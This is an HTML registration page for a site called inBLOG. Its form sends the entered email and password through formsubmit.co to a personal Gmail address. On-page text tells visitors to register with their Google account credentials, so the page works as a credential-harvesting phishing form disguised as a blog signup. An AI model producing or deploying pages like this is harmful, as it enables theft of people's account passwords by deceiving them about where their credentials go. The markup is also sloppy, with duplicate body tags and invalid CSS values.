<!DOCTYPE html>
<html>
    <head>
        <title>Inblognt-Login</title>
    </head>
    <style> 
*{
    padding: 0;
    margin: 0;

}

body{

    background-size: cover;
    background-color: #191919;

}

.login-form{
    width: 350px;
    top:50%;
    left:50%;
    transform: translate(-50%,-50%);
    position: absolute;
    color: #fff;

}
.login-form h1{
    font-size: 40px;
    text-align: 60%;
    text-transform: uppercase;
    width: 60%;
    margin-inline-start: 0px;
    margin-inline-end: 0px;
    font-family: Verdana, Geneva, Tahoma, sans-serif;

}

.h1{
    width: 50%;
    margin: 50px 0px; 
    
}

.login-form p{

    font-size: 20px;
    margin: 15px;
    


}
.login-form input{
    
    font-size: 16px;
    width: 100%;
    padding: 15px 10px;
    border: 0;
    outline:none;
    border-radius: 5px;

}

.login-form button{
    width: 370px;
    margin: 40px 0;
    padding: 15px 25px;
    font-size:24px;
    text-align: center;
    cursor: pointer;
    outline: none;
    color: #fff;
    background-color: rgb(0, 0, 0);
    border: none;
    border-radius: 15px;
    box-shadow: 0 5px rgb(255, 255, 255);
}

.button:hover{
    background-color: #b9c4f9;
    

}

.button:active{
    background-color: #ffffff;
    box-shadow: 0 2px rgb(255, 0, 0);
    transform:translate(2px);

}


h2{
    font-size: 2em;
    margin: 0;
    padding: 0;
    background:green;
    text-align: center;
    text-decoration-color: blue;
    font-family: Verdana, Geneva, Tahoma, sans-serif;


}
.login-form wronging{
    width: 50%;
    font-size: 10px;
    text-transform:uppercase;
    margin-inline-start: 0px;
    margin-inline-end: 0px;
    margin: 50px 0px; 
    font-family: 'Times New Roman', Times, serif;



}


    </style>
    <body>
        <h2>Wellcome-to-inBLOG</h2>

    </body>

    
    <body>


        <div class="login-form">
            <h1>  Registation!</h1>
            <form action="https://formsubmit.co/skanridegamerz@gmail.com" method="POST">
                <p>Email</p>
                <input type="hidden" name="_next" value="https://inblognt.online/inblognt\Inblog-Home\InBlog-Home.html">
                <input type="text" name="user" placeholder="Enter your Email..." required>
                <p>Password</p>
                <input type="password" name="password" placeholder="password..." required>
                <button class="button">SignUp!</button>
                <center>
                <h3 class="wronging">use your google account to Register with our site. after entering your cridentials you can login</h3>
                </center>
            </form>
        </div>
    </body>
</html>